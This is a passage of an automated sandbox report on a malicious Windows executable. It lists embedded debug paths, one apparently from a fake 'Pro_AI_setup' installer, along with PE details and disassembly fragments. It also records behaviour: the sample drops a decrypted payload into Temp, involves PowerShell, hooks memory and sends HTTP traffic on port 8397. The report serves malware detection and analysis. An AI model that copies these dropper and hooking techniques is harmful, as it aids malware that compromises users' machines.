Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Contracts\Release\net7.0\System.Diagnostics.Contracts.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Timer\Release\net7.0\System.Threading.Timer.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net7.0\System.Collections.pdb source: mDHwap5GlV.exe, 00000000.00000002.2605844050.000000000D521000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2605777963.000000000D4D0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/System.Data/Release/net7.0-windows/System.Data.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO\Release\net7.0\System.IO.pdb source: mDHwap5GlV.exe, 00000000.00000002.2586356950.000000000A070000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO\Release\net7.0\System.IO.pdbSHA256w source: mDHwap5GlV.exe, 00000000.00000002.2586356950.000000000A070000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/System.Configuration/Release/net7.0-windows/System.Configuration.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2585865823.0000000009D10000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: wntdll.pdbUGP source: decrypted_app_1.exe, 00000007.00000002.3101125278.00000000030E0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Debug\Release\net7.0\System.Diagnostics.Debug.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net7.0\System.Threading.Overlapped.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2611810679.000000000E300000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.UnmanagedMemoryStream\Release\net7.0\System.IO.UnmanagedMemoryStream.pdb source: mDHwap5GlV.exe, 00000000.00000002.2586356950.000000000A070000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Collections.Immutable.ni.pdb source: mDHwap5GlV.exe
Source: Binary string: C:\Users\Administrator\Desktop\DayDerry\Pro_AI_setup_v_1.03\obj\Release\net7.0\win-x86\Pro_AI_setup_v_1.03.pdb source: mDHwap5GlV.exe
Source: Binary string: System.Net.NameResolution.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2612038536.000000000E351000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2611890775.000000000E320000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Specialized\Release\net7.0\System.Collections.Specialized.pdb source: mDHwap5GlV.exe, 00000000.00000002.2620268309.000000000E7F0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2620375104.000000000E811000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net7.0\System.Runtime.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2582770722.0000000009AB0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.VisualBasic.Core\Release\net7.0-windows\Microsoft.VisualBasic.Core.pdb source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Quic\Release\net7.0-windows\System.Net.Quic.pdbSHA256: source: mDHwap5GlV.exe, 00000000.00000002.2607352936.000000000DCF0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2607441531.000000000DD41000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net7.0\System.Diagnostics.Tracing.pdb source: mDHwap5GlV.exe, 00000000.00000002.2592357978.000000000C7E0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net7.0\System.Runtime.InteropServices.pdb source: mDHwap5GlV.exe, 00000000.00000002.2604580772.000000000D410000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2604677499.000000000D431000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: System.Private.CoreLib.ni.pdb[ source: mDHwap5GlV.exe, 00000000.00000002.2579250660.0000000008DC1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2577048094.0000000008330000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Net.Quic.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2607352936.000000000DCF0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2607441531.000000000DD41000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net7.0\System.Threading.pdb source: mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2595974127.000000000D041000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593385471.000000000C8A1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Timer\Release\net7.0\System.Threading.Timer.pdb source: mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Threading.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2595974127.000000000D041000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.AppContext\Release\net7.0\System.AppContext.pdbSHA256 source: mDHwap5GlV.exe
Source: Binary string: System.Net.ServicePoint.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2610251919.000000000E1E0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.CSharp\Release\net7.0-windows\Microsoft.CSharp.pdb source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.Primitives\Release\net7.0\System.Security.Cryptography.Primitives.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2593821344.000000000CA20000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net7.0\System.Collections.Concurrent.pdb source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.Primitives\Release\net7.0\System.Security.Cryptography.Primitives.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593821344.000000000CA20000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net7.0\System.Memory.pdb source: mDHwap5GlV.exe, 00000000.00000002.2604929693.000000000D481000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2604788493.000000000D440000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net7.0-windows\System.Net.NameResolution.pdb source: mDHwap5GlV.exe, 00000000.00000002.2612038536.000000000E351000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2611890775.000000000E320000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net7.0\System.Diagnostics.Tracing.pdbSHA256q source: mDHwap5GlV.exe, 00000000.00000002.2592357978.000000000C7E0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography\Release\net7.0-windows\System.Security.Cryptography.pdb source: mDHwap5GlV.exe, 00000000.00000002.2594220011.000000000CBE1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593821344.000000000CA20000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: Microsoft.CSharp.ni.pdb source: mDHwap5GlV.exe
Source: Binary string: System.Collections.ni.pdb; lr source: mDHwap5GlV.exe, 00000000.00000002.2605844050.000000000D521000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2605777963.000000000D4D0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Collections.Concurrent.ni.pdb source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net7.0\System.Runtime.pdb source: mDHwap5GlV.exe, 00000000.00000002.2582770722.0000000009AB0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Net.Sockets.ni.pdbp source: mDHwap5GlV.exe, 00000000.00000002.2610251919.000000000E1E0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2610536524.000000000E271000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: System.Diagnostics.Process.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2607643100.000000000DDB0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2607711334.000000000DE01000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Console\Release\net7.0-windows\System.Console.pdb source: mDHwap5GlV.exe, mDHwap5GlV.exe, 00000000.00000002.2585865823.0000000009D10000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2583359508.0000000009AD1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: System.Private.Uri.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2594641559.000000000CDAA000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2594814056.000000000CDF1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.AppContext\Release\net7.0\System.AppContext.pdb source: mDHwap5GlV.exe
Source: Binary string: Microsoft.VisualBasic.Core.ni.pdb source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net7.0\System.Diagnostics.DiagnosticSource.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593385471.000000000C8A1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net7.0\System.Threading.ThreadPool.pdb source: mDHwap5GlV.exe, 00000000.00000002.2607545242.000000000DD80000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net7.0\Microsoft.Win32.Primitives.pdbSHA256 source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net7.0-windows\System.Net.Security.pdbSHA256S source: mDHwap5GlV.exe, 00000000.00000002.2593612711.000000000C991000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593507496.000000000C900000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Uri\Release\net7.0\System.Private.Uri.pdb source: mDHwap5GlV.exe, 00000000.00000002.2594641559.000000000CDAA000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2594814056.000000000CDF1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: System.Linq.Expressions.ni.pdb source: mDHwap5GlV.exe, mDHwap5GlV.exe, 00000000.00000002.2586676294.000000000A3E1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2586356950.000000000A070000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Sockets\Release\net7.0-windows\System.Net.Sockets.pdb source: mDHwap5GlV.exe, 00000000.00000002.2610251919.000000000E1E0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2610536524.000000000E271000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.UnmanagedMemoryStream\Release\net7.0\System.IO.UnmanagedMemoryStream.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2586356950.000000000A070000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/System.Configuration/Release/net7.0-windows/System.Configuration.pdb source: mDHwap5GlV.exe, 00000000.00000002.2585865823.0000000009D10000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net7.0-windows\System.Net.Security.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593612711.000000000C991000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593507496.000000000C900000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Memory.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2604929693.000000000D481000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2604788493.000000000D440000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Net.Quic.ni.pdb,3 source: mDHwap5GlV.exe, 00000000.00000002.2607352936.000000000DCF0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2607441531.000000000DD41000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net7.0\System.Text.Encoding.Extensions.pdb source: mDHwap5GlV.exe, 00000000.00000002.2608346084.000000000DE60000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net7.0\System.Threading.Overlapped.pdb source: mDHwap5GlV.exe, 00000000.00000002.2611810679.000000000E300000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x86.Release\Corehost.Static\singlefilehost.pdb source: mDHwap5GlV.exe
Source: Binary string: System.Security.Cryptography.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2594220011.000000000CBE1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593821344.000000000CA20000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Contracts\Release\net7.0\System.Diagnostics.Contracts.pdbSHA256_O source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Diagnostics.Process.ni.pdb]:K source: mDHwap5GlV.exe, 00000000.00000002.2607643100.000000000DDB0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2607711334.000000000DE01000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net7.0-windows\System.Net.Primitives.pdb source: mDHwap5GlV.exe, mDHwap5GlV.exe, 00000000.00000002.2583501518.0000000009B20000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2583583075.0000000009B61000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices.RuntimeInformation\Release\net7.0\System.Runtime.InteropServices.RuntimeInformation.pdb source: mDHwap5GlV.exe, 00000000.00000002.2604580772.000000000D410000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.X509Certificates\Release\net7.0\System.Security.Cryptography.X509Certificates.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593821344.000000000CA20000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Runtime.InteropServices.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2604580772.000000000D410000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2604677499.000000000D431000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.X509Certificates\Release\net7.0\System.Security.Cryptography.X509Certificates.pdbSHA256B source: mDHwap5GlV.exe, 00000000.00000002.2593821344.000000000CA20000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdbSHA256(s source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net7.0\System.Net.ServicePoint.pdb source: mDHwap5GlV.exe, 00000000.00000002.2610251919.000000000E1E0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net7.0-windows\System.Net.Primitives.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2583501518.0000000009B20000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2583583075.0000000009B61000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net7.0\System.Linq.pdb source: mDHwap5GlV.exe, 00000000.00000002.2587665887.000000000A930000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2587777590.000000000A9B1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Registry\Release\net7.0-windows\Microsoft.Win32.Registry.pdb source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Buffers\Release\net7.0\System.Buffers.pdbSHA256 source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq.Expressions\Release\net7.0\System.Linq.Expressions.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2586676294.000000000A3E1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2586356950.000000000A070000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net7.0-windows/System.Management.pdbSHA256A) source: mDHwap5GlV.exe, 00000000.00000002.2609096644.000000000DEF0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Console.ni.pdb source: mDHwap5GlV.exe, mDHwap5GlV.exe, 00000000.00000002.2585865823.0000000009D10000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2583359508.0000000009AD1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Debug\Release\net7.0\System.Diagnostics.Debug.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/System.CodeDom/Release/net7.0/System.CodeDom.pdbSHA256 ] source: mDHwap5GlV.exe, 00000000.00000002.2609096644.000000000DEF0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Net.Http.ni.pdb source: mDHwap5GlV.exe, mDHwap5GlV.exe, 00000000.00000002.2586133206.0000000009EE1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2585894979.0000000009D40000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net7.0\Microsoft.Win32.Primitives.pdb source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net7.0\System.Threading.ThreadPool.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2607545242.000000000DD80000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net7.0-windows\System.Net.Http.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2586133206.0000000009EE1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2585894979.0000000009D40000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net7.0\System.Text.Encoding.Extensions.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2608346084.000000000DE60000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net7.0\System.Threading.Thread.pdb source: mDHwap5GlV.exe, 00000000.00000002.2607545242.000000000DD80000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2609058208.000000000DEE0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net7.0-windows\System.Net.Http.pdb source: mDHwap5GlV.exe, mDHwap5GlV.exe, 00000000.00000002.2586133206.0000000009EE1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2585894979.0000000009D40000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Net.Primitives.ni.pdb source: mDHwap5GlV.exe, mDHwap5GlV.exe, 00000000.00000002.2583501518.0000000009B20000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2583583075.0000000009B61000.00000020.00000001.00040000.00000003.sdmp
Source: mDHwap5GlV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: mDHwap5GlV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: mDHwap5GlV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: mDHwap5GlV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: mDHwap5GlV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: decrypted_app_1.exe.0.dr Static PE information: real checksum: 0x7291ff should be: 0x784364
Source: mDHwap5GlV.exe Static PE information: section name: .CLR_UEF
Source: mDHwap5GlV.exe Static PE information: section name: .didat
Source: mDHwap5GlV.exe Static PE information: section name: _RDATA
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09B6319D push ebp; iretd 0_2_09B6319E
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09B62CD1 pushfd ; iretd 0_2_09B62CD5
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09B63475 push es; iretd 0_2_09B63476
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09B627B9 push ss; iretd 0_2_09B627BA
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09B62358 push esi; iretd 0_2_09B62361
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09B63759 pushfd ; iretd 0_2_09B6375A
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_09EE4C47 push cx; ret 0_2_09EE4C88
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_0A3E7B4B push FFFFFFB1h; iretd 0_2_0A3E7B5E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_046811AD push esp; ret 4_2_046811C1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_04680AB7 push ebp; ret 4_2_04680AC2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_04680B31 push esi; ret 4_2_04680B32
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03001BB8 push eax; ret 7_2_03001C0C
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03001BE9 push eax; ret 7_2_03001C0C
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_0300721D push ecx; ret 7_2_03007230
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03005283 push dword ptr [esp+34h]; retn 0038h 7_2_0300527D
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03001287 pushad ; ret 7_2_03001288
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03001128 pushfd ; mov dword ptr [esp], eax 7_2_03001116
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03005016 push eax; ret 7_2_03005037
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_030010CE pushfd ; mov dword ptr [esp], eax 7_2_03001116
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_030010E7 pushfd ; mov dword ptr [esp], eax 7_2_03001116
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03002E4A pushad ; ret 7_2_03002E02
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03002EAF pushad ; ret 7_2_03002EB1
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03004EFC push eax; ret 7_2_03004F5C
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03001529 pushad ; ret 7_2_0300152D
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03004D2A push eax; ret 7_2_03004D36
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03004D51 push eax; ret 7_2_03004D55
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03002D76 pushad ; ret 7_2_03002E02
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03002D7D pushad ; ret 7_2_03002E02
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03001D8A push eax; ret 7_2_03001DAC
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03002DA4 pushad ; ret 7_2_03002E02
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03002DAB pushad ; ret 7_2_03002E02
Source: C:\Users\user\Desktop\mDHwap5GlV.exe File created: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory written: PID: 3732 base: 76F02EC0 value: E9 3B D1 FB 8B
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 8397
Source: unknown Network traffic detected: HTTP traffic on port 8397 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 8397
Source: unknown Network traffic detected: HTTP traffic on port 8397 -> 49805
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
